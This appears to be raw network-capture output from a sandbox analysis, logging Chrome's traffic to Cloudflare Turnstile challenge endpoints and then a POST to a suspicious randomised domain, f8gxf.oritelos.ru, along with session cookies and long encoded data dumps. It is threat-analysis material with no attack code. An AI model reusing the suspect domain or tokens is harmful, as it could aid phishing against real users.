                                                Data Ascii: Gp2qjA6+LfsPWvxurE2Ljo/ev6+8/E2dHD6v7gBO73yA4O0snvzt7q1gQU/NLP/BPgHwsj7+Lu/OMAKBctKCUHMh8vCwvuNAsh9BsrMRgH/jkQK0I8ExlGQBkdSkQYIU5IG0k8Sx5LE1ImJ1EWKV9aXzpBG0RDMyYxVSIeLVkmImhdKiZ0YS4uWFNZb0VRcG5qcTU6UnV1YWSCRHd7dm6EUYtRkYJNV4ZjTFVukYdRimuceoBxj5yip6F5jZ6Wj
                                                2024-05-30 10:20:52 UTC1369INData Raw: 73 35 66 6d 31 78 74 48 79 32 38 76 58 39 73 6d 30 38 50 62 64 30 39 2f 2b 31 63 54 64 44 66 7a 58 33 41 67 42 46 4d 37 76 38 67 44 31 30 42 55 45 2b 64 51 5a 37 64 63 54 45 78 48 33 46 4e 33 63 41 50 37 33 35 42 30 6b 48 53 67 69 4a 41 4d 6e 4c 69 50 78 46 42 51 32 43 2f 6f 78 43 69 59 75 46 53 73 4d 50 6b 44 2b 41 76 67 57 46 7a 73 2b 4c 41 4d 62 49 69 73 65 50 45 45 68 4a 30 55 6e 44 78 42 4a 56 46 67 63 58 54 64 51 4b 53 45 34 56 53 31 50 4a 6b 68 70 4d 32 6c 62 5a 32 73 2b 4c 69 74 47 62 30 78 78 64 79 35 4d 4d 6a 67 74 61 6d 35 49 53 55 42 74 63 58 68 57 52 45 35 50 63 58 64 5a 53 33 31 66 53 32 39 75 55 55 74 4c 56 45 2b 55 55 49 56 78 64 4a 64 62 62 48 52 52 61 49 42 64 64 32 79 56 64 5a 4b 68 64 57 65 4c 69 6d 31 6e 73 4b 75 65 71 6e 4a 71 70 35
                                                Data Ascii: s5fm1xtHy28vX9sm08Pbd09/+1cTdDfzX3AgBFM7v8gD10BUE+dQZ7dcTExH3FN3cAP735B0kHSgiJAMnLiPxFBQ2C/oxCiYuFSsMPkD+AvgWFzs+LAMbIisePEEhJ0UnDxBJVFgcXTdQKSE4VS1PJkhpM2lbZ2s+LitGb0xxdy5MMjgtam5ISUBtcXhWRE5PcXdZS31fS29uUUtLVE+UUIVxdJdbbHRRaIBdd2yVdZKhdWeLim1nsKueqnJqp5
                                                2024-05-30 10:20:52 UTC1369INData Raw: 30 2f 71 39 41 62 33 2b 2f 4c 72 4e 42 50 44 47 31 41 72 54 43 39 37 59 2f 63 2f 70 33 66 33 53 38 75 41 48 37 4f 33 4d 43 42 37 54 31 64 58 57 45 74 67 65 42 50 49 6a 46 42 72 32 4b 68 59 45 42 2b 58 74 4b 68 4c 6f 4c 2f 37 72 37 67 7a 78 2b 44 6b 52 47 41 6a 77 47 51 7a 33 43 78 73 33 49 30 66 39 41 42 6f 43 53 67 51 57 48 43 68 4b 43 43 41 64 4e 54 4d 4f 56 69 67 35 47 54 45 31 4b 42 55 34 59 68 35 6a 46 6c 6f 32 49 6d 46 70 4b 57 67 2f 4a 69 74 74 51 32 55 6f 62 7a 4e 4d 56 58 52 4d 55 45 5a 36 54 79 38 30 66 48 6b 7a 4f 49 42 5a 63 55 4f 44 52 6a 39 57 68 34 57 42 53 34 78 4f 54 6c 46 4c 55 6f 35 69 6b 34 47 5a 57 4a 64 62 65 47 61 63 6d 5a 71 42 6f 6e 64 65 5a 61 5a 38 66 31 79 6f 66 32 5a 72 5a 32 36 79 65 71 39 7a 6a 49 4b 30 73 62 61 47 75 6f 2b
                                                Data Ascii: 0/q9Ab3+/LrNBPDG1ArTC97Y/c/p3f3S8uAH7O3MCB7T1dXWEtgeBPIjFBr2KhYEB+XtKhLoL/7r7gzx+DkRGAjwGQz3Cxs3I0f9ABoCSgQWHChKCCAdNTMOVig5GTE1KBU4Yh5jFlo2ImFpKWg/JittQ2UobzNMVXRMUEZ6Ty80fHkzOIBZcUODRj9Wh4WBS4xOTlFLUo5ik4GZWJdbeGacmZqBondeZaZ8f1yof2ZrZ26yeq9zjIK0sbaGuo+
                                                2024-05-30 10:20:52 UTC1369INData Raw: 66 58 31 42 4e 72 46 75 77 72 65 43 63 6f 4c 43 63 33 50 44 77 38 42 30 68 54 71 79 73 38 59 37 68 58 54 47 77 6e 64 30 39 72 68 4a 65 4d 6b 2b 69 4c 31 4a 2b 6e 65 36 53 7a 74 4a 68 45 76 48 66 48 6e 4d 7a 48 75 42 54 66 35 2b 66 30 37 4b 79 30 42 50 7a 34 51 45 6b 55 48 49 77 64 49 48 30 34 61 42 77 35 46 45 6b 38 53 55 69 46 54 51 55 34 6d 56 30 55 54 50 56 30 7a 56 69 31 67 58 56 30 63 5a 46 46 69 4d 69 4d 71 62 6a 5a 73 4c 6e 45 6f 63 55 68 50 4d 6e 4e 69 52 48 41 7a 4c 6a 4e 4f 50 56 64 32 50 6b 35 4d 59 47 47 45 63 54 39 6d 51 30 4a 59 62 55 31 36 59 56 74 4f 6b 4a 5a 6a 6c 6f 4a 6b 64 35 65 46 56 35 52 6f 58 35 46 68 6e 34 35 38 64 61 5a 6d 6e 57 42 6b 67 71 36 47 71 36 6d 6d 6b 58 75 67 69 4a 46 31 6a 59 74 36 75 48 75 63 69 37 36 56 6f 49 33 41
                                                Data Ascii: fX1BNrFuwreCcoLCc3PDw8B0hTqys8Y7hXTGwnd09rhJeMk+iL1J+ne6SztJhEvHfHnMzHuBTf5+f07Ky0BPz4QEkUHIwdIH04aBw5FEk8SUiFTQU4mV0UTPV0zVi1gXV0cZFFiMiMqbjZsLnEocUhPMnNiRHAzLjNOPVd2Pk5MYGGEcT9mQ0JYbU16YVtOkJZjloJkd5eFV5RoX5Fhn458daZmnWBkgq6Gq6mmkXugiJF1jYt6uHuci76VoI3A


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.449765104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:53 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:53 UTC375INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:20:53 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                cf-chl-out: 9ZucDE6WLg4uudvQJENz+A==$c3SVAGGuGncXQTaWoek8Cw==
                                                Server: cloudflare
                                                CF-RAY: 88bdfe811dc31879-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:53 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.449770104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:05 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 33321
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: f67bea3da7e6db1
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:05 UTC16384OUTData Raw: 76 5f 38 38 62 64 66 65 35 31 32 65 35 64 34 33 30 31 3d 64 63 4a 61 46 41 55 70 34 41 34 6a 4a 41 65 6b 5a 6a 4a 61 4a 34 55 77 6b 47 55 2d 6b 58 6b 41 63 55 53 6b 52 61 7a 33 34 45 68 6b 4b 41 6b 45 43 61 45 32 76 6b 45 61 65 4a 45 48 6b 31 6a 41 36 43 6a 65 6b 62 61 25 32 62 41 57 4c 6b 64 4e 5a 72 37 34 61 55 63 55 67 50 61 31 77 32 6b 67 53 6f 32 6b 73 6b 6c 57 54 33 6b 4a 73 77 6a 43 75 6a 6b 45 65 46 6b 6c 34 55 58 6b 5a 4a 6b 66 6b 6c 2b 66 43 6b 55 53 61 55 69 6c 7a 61 6c 6b 33 5a 4c 7a 77 44 67 4a 75 4d 56 6c 6b 7a 24 38 42 6b 55 65 61 4c 73 45 4a 61 6b 4c 55 44 53 35 77 43 52 6c 6f 6b 54 65 4a 57 44 2b 65 6b 6b 71 66 67 61 55 45 5a 61 6a 41 61 31 4c 6b 65 2b 32 6f 6b 44 62 54 31 73 24 41 61 6c 37 42 72 34 6c 39 39 4b 2d 54 2d 64 24 55 6d 39 73
                                                Data Ascii: v_88bdfe512e5d4301=dcJaFAUp4A4jJAekZjJaJ4UwkGU-kXkAcUSkRaz34EhkKAkECaE2vkEaeJEHk1jA6Cjekba%2bAWLkdNZr74aUcUgPa1w2kgSo2ksklWT3kJswjCujkEeFkl4UXkZJkfkl+fCkUSaUilzalk3ZLzwDgJuMVlkz$8BkUeaLsEJakLUDS5wCRlokTeJWD+ekkqfgaUEZajAa1Lke+2okDbT1s$Aal7Br4l99K-T-d$Um9s
                                                2024-05-30 10:21:05 UTC16384OUTData Raw: 6e 6a 70 45 46 71 6c 6b 5a 6b 4d 61 31 59 6c 63 41 63 55 24 6b 67 56 38 43 31 6b 55 74 6b 66 47 6a 43 55 58 6b 50 6b 6c 24 2b 77 6b 4e 6b 45 4a 45 72 6b 68 53 36 4a 55 4a 6b 44 61 6a 6b 31 24 6b 68 72 36 34 55 43 6b 30 6b 6c 63 45 76 6b 66 61 41 59 6b 58 61 52 61 41 6b 41 39 74 6f 4f 55 42 55 42 43 2d 75 34 56 6b 34 61 43 61 31 6b 6b 57 51 52 30 52 41 6b 4b 74 50 75 2d 6b 6b 6d 74 32 6b 55 61 6b 4a 34 55 51 6c 4a 41 6f 61 30 4d 54 6b 55 6e 6b 59 6b 70 56 6b 43 55 4d 6b 31 56 6b 76 6b 4f 61 6c 72 6f 4a 6b 55 51 6a 34 41 70 6b 6c 61 55 6c 45 34 6b 48 6b 6c 4c 6b 71 6b 67 53 5a 4a 41 56 55 72 6b 4e 56 41 4a 55 5a 61 65 61 54 43 6b 51 63 36 59 55 61 6b 76 6b 70 59 41 68 6b 6a 61 36 6a 7a 62 6b 32 71 6b 51 41 43 6b 36 61 31 48 45 47 6b 4b 51 79 4a 6b 24 6b 63
                                                Data Ascii: njpEFqlkZkMa1YlcAcU$kgV8C1kUtkfGjCUXkPkl$+wkNkEJErkhS6JUJkDajk1$khr64UCk0klcEvkfaAYkXaRaAkA9toOUBUBC-u4Vk4aCa1kkWQR0RAkKtPu-kkmt2kUakJ4UQlJAoa0MTkUnkYkpVkCUMk1VkvkOalroJkUQj4ApklaUlE4kHklLkqkgSZJAVUrkNVAJUZaeaTCkQc6YUakvkpYAhkja6jzbk2qkQACk6a1HEGkKQyJk$kc
                                                2024-05-30 10:21:05 UTC553OUTData Raw: 72 54 4d 45 5a 61 48 6c 45 37 6c 6d 6a 41 24 5a 69 66 43 55 74 6b 4d 5a 6c 4a 69 32 6b 59 67 55 5a 55 49 69 4a 39 54 68 58 55 6b 50 42 39 4a 64 39 59 33 68 4d 57 46 4f 2d 77 6e 6f 6a 46 67 56 41 47 64 52 46 79 6b 55 47 64 67 46 54 59 73 47 4d 56 59 45 59 76 44 55 64 46 55 69 41 39 36 54 37 64 61 6b 32 30 6e 41 47 56 38 33 50 38 46 36 59 57 67 36 74 30 65 44 4a 47 36 41 56 74 64 73 4f 55 52 5a 42 43 2b 41 37 57 35 61 63 6b 46 33 69 33 62 76 38 6c 37 43 24 66 47 5a 50 6b 68 6b 50 44 4f 35 4d 6a 43 41 51 62 34 45 63 31 6c 4a 62 31 30 76 6b 32 59 6e 58 63 75 55 58 65 72 34 37 64 30 6c 4a 49 4b 77 49 5a 58 56 54 59 48 34 6b 4d 43 67 59 61 50 70 47 56 65 37 65 49 55 6d 53 6a 70 45 72 57 58 50 62 30 6c 79 6b 41 34 59 79 6b 5a 44 59 59 64 34 6c 49 55 76 4c 6e 4e
                                                Data Ascii: rTMEZaHlE7lmjA$ZifCUtkMZlJi2kYgUZUIiJ9ThXUkPB9Jd9Y3hMWFO-wnojFgVAGdRFykUGdgFTYsGMVYEYvDUdFUiA96T7dak20nAGV83P8F6YWg6t0eDJG6AVtdsOURZBC+A7W5ackF3i3bv8l7C$fGZPkhkPDO5MjCAQb4Ec1lJb10vk2YnXcuUXer47d0lJIKwIZXVTYH4kMCgYaPpGVe7eIUmSjpErWXPb0lykA4YykZDYYd4lIUvLnN
                                                2024-05-30 10:21:05 UTC1281INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 3416
                                                Connection: close
                                                cf-chl-out: eK4Dw0rMcGZvsafI2uH9kjDppYFYSwUVBu4fu8NwjjaSim5NuWC2loSBrRqfWOBeeCFn+79PeR/HX2E3sHdPPr8U6U/rIgjdOIE1L3m02Nl6cJ1AwxRMs8ZZKaAk/0vp$F9xaZpDaTszRUgwuwawQkw==
                                                cf-chl-out-s: /ZgFcQWqO307fjFDvUceSdUSStd1xgnY3Rn/bnPykPslRHxkqOHRa8QtIbJTYzuhCkRL4YcT1bx7j6e45nu29u4+/fc6QKKg5FAWpW8uFUqog49zQGeSfntGr4XR5njfh+3DOMSZ/kdFjjsgjYwik0OoFnUL40IbT2iQT0WJAXyX/ia8INv2HxYt0Q2mf6wL91YIDEiQ0HxWDKDgOMeUN8Y6uPlq7h0vSV20Ulfw4ETQWqXydcVh2BVbMHQArlUjlaoYBToxvgTe+6GQdIuHTHyqlCBXxmuZ4zBt27FWFXzdMsczLMZSxHf6VzGIUZzU49ud44LYeWf+ZGRfE66FgYu8UvnijLKFwH+njXjuEK2rgxJCklIH3fq1oL3YinQpJZJ/elXabrkQ3tb2HoCrm2e23ffxSSfVIeMhJEtnxPvbNddki1uSyEEii++3sOeDfWfE2cszAlGQBPrZroqT0MpFUSHHnY2Oet2dw+iBcCzqFXGI+1++Vtb4LLK0kk/guz5UirglADs0IA8eVeFeMzWOi7UjyNv6BtcJds9Tn1hPtSNHIOvEL7smoqapaURQ6w8bj0dtL1pkiLJhz+37CabsVxZN1XL/YeiZ1XbQMzuuVg/NGUXbPB1kUE+3outIgRvfFZokIJz7zY/8nKTmKB8iLjtO3qwuzFuMOhazbiemSWauYqsJ9hOs7XaibZJYJ3uS865j1D7BpxdtcuNVkkaF11BoQ8e4wqEuLm1tg0i6LNdqx1FajhkbcdBDjX3FrS3srUD1fai0C4h62BAhL6tvVsKzy/pPgsPHpG4p5PQDXZAjjTDfHuRKzVtB19DFZMf/SatrdpQ4w/UYLwQfLg==$3qZzJds1ftCXtAaqv7C+pw==
                                                Server: cloudflare
                                                CF-RAY: 88bdfeccbade4402-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:05 UTC88INData Raw: 77 61 53 61 6d 61 4f 4b 74 62 6a 45 75 4c 32 2b 7a 73 4b 6c 7a 61 72 59 31 5a 6a 63 72 39 4b 32 6c 38 6d 58 32 71 47 36 6d 39 2f 59 6f 4f 44 6f 31 37 6d 6f 71 38 48 73 71 2b 2b 6c 77 74 33 49 36 4e 62 68 7a 4f 32 34 36 50 4c 79 39 66 79 34 31 51 47 37 42 4d 66 6e
                                                Data Ascii: waSamaOKtbjEuL2+zsKlzarY1Zjcr9K2l8mX2qG6m9/YoODo17moq8Hsq++lwt3I6NbhzO246PLy9fy41QG7BMfn
                                                2024-05-30 10:21:05 UTC1369INData Raw: 78 75 62 38 78 38 72 6d 2f 4d 72 72 36 65 55 53 36 42 54 55 44 73 76 34 44 68 54 6e 2b 2f 45 65 2f 43 44 67 33 68 34 46 46 76 63 65 2f 42 37 32 4a 7a 44 74 35 68 33 76 4a 67 54 31 4a 43 73 4b 4b 68 4d 76 4d 77 66 30 45 6a 34 76 51 50 55 55 51 69 55 30 50 67 6f 47 50 68 78 46 44 45 45 68 44 79 73 6d 55 45 39 55 46 56 41 6a 47 30 34 75 4f 78 55 2f 4d 32 41 36 4c 30 4a 64 55 56 45 69 5a 31 55 33 61 6b 4a 4f 4c 32 70 7a 61 6a 46 43 55 31 63 7a 53 6e 46 36 57 30 78 34 64 6c 46 4d 56 56 39 64 55 34 56 65 59 32 71 42 64 48 56 47 68 34 35 4c 6b 47 6d 4b 6b 59 43 57 6a 6f 78 78 59 31 68 35 6a 35 35 33 63 6f 70 62 59 33 6c 6b 59 6e 74 37 65 56 79 41 5a 61 43 74 72 4a 68 78 73 49 6c 7a 74 4b 4f 33 74 59 4e 35 76 4b 69 49 6e 6e 79 53 72 4b 47 66 66 34 2b 75 6c 4c 72
                                                Data Ascii: xub8x8rm/Mrr6eUS6BTUDsv4DhTn+/Ee/CDg3h4FFvce/B72JzDt5h3vJgT1JCsKKhMvMwf0Ej4vQPUUQiU0PgoGPhxFDEEhDysmUE9UFVAjG04uOxU/M2A6L0JdUVEiZ1U3akJOL2pzajFCU1czSnF6W0x4dlFMVV9dU4VeY2qBdHVGh45LkGmKkYCWjoxxY1h5j553copbY3lkYnt7eVyAZaCtrJhxsIlztKO3tYN5vKiInnySrKGff4+ulLr
                                                2024-05-30 10:21:05 UTC1369INData Raw: 74 38 4d 43 75 76 75 33 74 4d 4d 36 4f 4c 57 43 66 62 2b 2f 76 58 61 32 66 66 33 37 74 77 6b 41 2f 6a 78 33 50 72 33 36 42 6b 65 36 77 76 36 43 41 2f 78 46 79 51 5a 44 69 59 51 50 44 67 35 48 41 30 57 51 78 34 32 2f 44 38 37 49 67 59 66 4b 54 34 72 44 6a 30 77 43 78 34 6b 49 6a 4a 4f 4a 68 45 72 4d 54 67 34 50 68 6f 35 4b 68 30 61 50 44 45 6a 52 46 63 34 59 53 6c 5a 50 43 6f 73 53 30 41 79 4b 57 45 73 64 55 6c 54 56 54 49 34 61 48 4e 54 56 6d 39 51 67 56 52 66 59 6c 42 50 64 48 74 4b 58 57 64 48 52 6b 39 73 59 49 35 65 67 59 71 4b 58 34 5a 6f 56 32 4f 49 65 6d 68 71 6a 58 31 69 64 4a 47 42 6e 58 6d 55 69 47 5a 64 68 70 2b 68 68 70 79 6e 69 34 75 69 67 58 5a 31 6c 49 68 36 6a 36 69 30 69 36 36 66 69 70 54 43 6f 72 70 2b 6f 62 32 62 66 4d 65 2b 75 59 32 49
                                                Data Ascii: t8MCuvu3tMM6OLWCfb+/vXa2ff37twkA/jx3Pr36Bke6wv6CA/xFyQZDiYQPDg5HA0WQx42/D87IgYfKT4rDj0wCx4kIjJOJhErMTg4Pho5Kh0aPDEjRFc4YSlZPCosS0AyKWEsdUlTVTI4aHNTVm9QgVRfYlBPdHtKXWdHRk9sYI5egYqKX4ZoV2OIemhqjX1idJGBnXmUiGZdhp+hhpyni4uigXZ1lIh6j6i0i66fipTCorp+ob2bfMe+uY2I
                                                2024-05-30 10:21:05 UTC590INData Raw: 62 6d 35 65 50 69 38 76 6e 74 31 66 66 74 37 75 73 43 38 42 77 56 46 42 73 68 36 67 4c 6e 42 69 77 64 2b 7a 41 66 44 66 34 57 49 51 34 59 39 52 6f 4c 4c 67 72 32 44 78 7a 38 50 68 6c 47 2f 44 73 69 4b 6a 6f 57 4a 7a 34 34 54 79 55 63 48 67 38 6f 52 55 6f 69 4c 7a 4e 59 55 6a 55 71 53 46 4d 78 56 6d 42 56 4f 7a 52 67 58 6b 42 44 4d 79 68 67 50 54 63 72 58 55 74 54 55 30 6f 76 4c 6b 78 4d 51 7a 46 34 56 30 31 47 4d 55 39 4d 50 57 31 79 51 46 39 50 58 47 4e 47 61 33 68 74 59 6e 70 6b 6b 49 79 4e 63 47 46 71 6c 33 4b 4b 55 5a 4f 50 64 6c 70 7a 66 5a 4a 2f 59 70 47 45 58 33 4a 34 64 6f 61 69 65 6d 56 2f 68 59 79 4d 6b 6d 36 4e 66 6e 46 75 6b 49 56 33 6d 4b 75 4d 74 58 32 74 6b 48 36 41 6e 35 53 47 66 62 57 41 79 5a 32 6e 71 59 61 4d 76 4d 65 6e 71 73 4f 6b 31
                                                Data Ascii: bm5ePi8vnt1fft7usC8BwVFBsh6gLnBiwd+zAfDf4WIQ4Y9RoLLgr2Dxz8PhlG/DsiKjoWJz44TyUcHg8oRUoiLzNYUjUqSFMxVmBVOzRgXkBDMyhgPTcrXUtTU0ovLkxMQzF4V01GMU9MPW1yQF9PXGNGa3htYnpkkIyNcGFql3KKUZOPdlpzfZJ/YpGEX3J4doaiemV/hYyMkm6NfnFukIV3mKuMtX2tkH6An5SGfbWAyZ2nqYaMvMenqsOk1


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.449772104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:06 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:06 UTC375INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:21:06 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                cf-chl-out: p0Bjouasp840d1nQCSd4Vw==$YY9gdYrkM/9LyMyqiUavUw==
                                                Server: cloudflare
                                                CF-RAY: 88bdfed16dd54402-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.449771188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:06 UTC1412OUTPOST /pbGQlY127p6h0ts0giGGM6xrw HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                Content-Length: 1318
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-platform: "Windows"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT2Ln7tcTYAnrFObv
                                                Accept: */*
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://f8gxf.oritelos.ru/hIzc6w/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6Ik11Z0FaT29QLzNyb3R2OFhaek5PaXc9PSIsInZhbHVlIjoidmZyeXN3T29GQi9PR2NVeGlUc0I1MDgrZTdOcHhsVDg2ZVdWQWxEMWRMTXVFUDhzZ01HbVNEa3M5YVJ2SFhLSGowSVl5ZVJKaFl2WEZjbnU5S1JTQlFEWWVpR3dUcjAxb3hsTFIwVnR4NktsTEZ3QXdySVVRaDRnaW9IREFVZEciLCJtYWMiOiJlYmEwNDA3ZTA5MWMzNDkyOWU4NzJjNjAwYzc0Y2E5MjcwYzNkYWJjMTM0NzhlODJkOTQxM2FiNWUzMzI0ZjIzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImJjemp5S1NUVmtQZ1lnVlcyMWxaQ0E9PSIsInZhbHVlIjoiL09WM1BCbjgwS2lSRmxzaDQ2ZmR0R0RxSVZveFBMZEhhQmovTWcyUGx0K29hQnN3RmlGUUJZRnNHc0h4bS9qeEFtTzd5OXlCVDNTek90RGxYalUweldNOWp1WWdFTjNBS1ZZS1dVendlQ2tRSFZrZWNCR2Zud3Q3VE1xZWkzLzUiLCJtYWMiOiI2ZjdiYzFhZWY0MmZkYmFiZjM0ODVkZGU5NmI4N2U1NjIwMjc4NDkzNjc5NmJlY2Y2MzI0Mjc3MTEyODViY2JiIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:06 UTC1318OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 54 32 4c 6e 37 74 63 54 59 41 6e 72 46 4f 62 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 6c 46 73 7a 75 59 53 5a 42 78 38 78 57 49 45 37 69 58 76 50 50 48 33 44 4e 57 50 52 57 66 63 34 6a 50 72 74 6c 52 46 56 41 39 39 67 36 6a 69 70 58 64 4d 39 4b 67 34 6c 4f 54 4b 64 56 75 69 47 57 38 79 37 6f 59 35 4c 63 6b 6e 37 45 6b 38 61 5a 76 51 6e 57 46 58 39 62 73 61 48 6a 50 6a 54 35 77 33 36 37 4e 77 45 44 35 38 30 77 6d 4f 4b 74 55 7a 72 67 5a 4f 58 43 35 57 36 56 33 46 31 64 67 75 71 5f 6d 4b 4a 2d 52 63 4f 34 59 4e 4d 48 74 5a
                                                Data Ascii: ------WebKitFormBoundaryT2Ln7tcTYAnrFObvContent-Disposition: form-data; name="cf-turnstile-response"0.lFszuYSZBx8xWIE7iXvPPH3DNWPRWfc4jPrtlRFVA99g6jipXdM9Kg4lOTKdVuiGW8y7oY5Lckn7Ek8aZvQnWFX9bsaHjPjT5w367NwED580wmOKtUzrgZOXC5W6V3F1dguq_mKJ-RcO4YNMHtZ
                                                2024-05-30 10:21:06 UTC1001INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:06 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exYnUwQvrjXBa%2BodPvPJkfj8FP%2B0%2B8VfD%2B43Mrbuzual1Xfxho3wkLw8yoRjDwjdQVsLsRNnCm5qeRUwXe75eZrHSwCuJN6Z2yliWKPBZ%2Fljvw9Zittu8LDe88YQSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6Imt0TFhad2ZVSzZVcmpaVDJSMFpLaHc9PSIsInZhbHVlIjoidDJUOFRVcUdRS0FGSVR5VWJJTGxQUFlrWktpSVBqME10amZYZlVDeGgwTE1BYmRQMnpqVWVXL2RNdDN6M3hRQ0pJSVZ5SHJ2RGUwYThIMzN2WFZ0RFBkKzU1TDhvRVdaSW1Da3FQQnRBMVFSV3ZUbXQ1SUpwdE9BZ0hhSlJqWjYiLCJtYWMiOiI3MjliNzBiOGMxYWM1YTlhMjJkZjMyMWZiZjFhYzdkOTdmN2VmMDQ0ZjEzODViZDg0MTQzN2JkMmJkN2ZkZjBmIiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:21:06 GMT; Max-Age=7200; path=/; secure; samesite=none
